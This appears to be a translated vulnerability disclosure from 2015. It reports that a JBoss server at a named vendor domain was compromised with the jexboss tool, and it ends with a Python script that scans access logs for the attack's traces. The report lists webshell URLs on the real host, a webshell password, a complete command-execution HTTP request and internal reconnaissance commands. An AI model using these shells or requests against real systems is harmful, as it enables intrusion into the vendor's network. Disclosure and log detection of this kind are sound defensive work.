2015-10-16: Details reported to the vendor; awaiting vendor handling
2015-10-21: The vendor chose to ignore the vulnerability; details disclosed to the public
A shell has been obtained, which puts the internal network at risk.
http://shenpi.yonyou.com
Location of the small command shell:
http://shenpi.yonyou.com/jbossass/jbossass.jsp
How this command shell is used:
GET http://shenpi.yonyou.com/jbossass/jbossass.jsp?ppp=whoami HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: jexboss
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: shenpi.yonyou.com
Pragma: no-cache
Cookie: JSESSIONID=EBC96181BA0709FA6A30DC02674028E5
Using this command shell, an upload shell was uploaded first:
http://shenpi.yonyou.com/download/wpp.jsp
Then a one-line webshell was uploaded:
http://shenpi.yonyou.com/download/wpp1.jspx
Password: woo0yun
On the server:
C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\.\deploy\download.war\> arp -a
C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\deploy\download.war\> net view
The shell runs with admin privileges, so the internal network is reachable.
#Remove the shell
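To find requests like the one shown above in web access logs, the following added example (not part of the original report) flags the three indicators the report exposes: the `jexboss` User-Agent, the `/jbossass/jbossass.jsp` path and the `ppp` command parameter. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the report: the "jexboss" User-Agent, the dropped
# /jbossass/jbossass.jsp command shell and its "ppp" command parameter.
UA_MARK = "jexboss"
SHELL_PATH = re.compile(r"/jbossass/jbossass\.jsp$", re.I)
SCRIPT_EXT = re.compile(r"\.(jsp|jspx)$", re.I)
CMD_PARAM = "ppp"

# Combined log format (an assumption; adjust to your server's access-log layout).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return the reasons a log line looks like use of this command shell."""
    m = LINE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    if UA_MARK in m["ua"].lower():
        reasons.append("jexboss-user-agent")
    if SHELL_PATH.search(url.path):
        reasons.append("jbossass-shell-path")
    # A command parameter on a JSP page is suspicious even under another name.
    if CMD_PARAM in params and SCRIPT_EXT.search(url.path):
        reasons.append("command-parameter")
    return reasons

def scan(lines):
    """Yield (client_ip, path, reasons) for every suspicious line."""
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LINE.match(line)
            yield m["ip"], urlsplit(m["target"]).path, reasons

# Constructed sample log lines (documentation addresses, not from the report).
SAMPLE = [
    '203.0.113.7 - - [16/Oct/2015:09:12:01 +0800] "GET /jbossass/jbossass.jsp?ppp=whoami HTTP/1.1" 200 64 "-" "jexboss"',
    '198.51.100.4 - - [16/Oct/2015:09:12:05 +0800] "GET /index.jsp?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Oct/2015:09:13:40 +0800] "GET /JBOSSASS/jbossass.jsp?ppp=arp+-a HTTP/1.1" 200 900 "-" "curl/7.40"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The third sample line shows why the path and parameter checks matter: a client that changes its User-Agent is still flagged.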
Severity: No impact (ignored by vendor)
Ignored at: 2015-10-21 10:02
Vulnerability Rank: 15 (WooYun rating)
None yet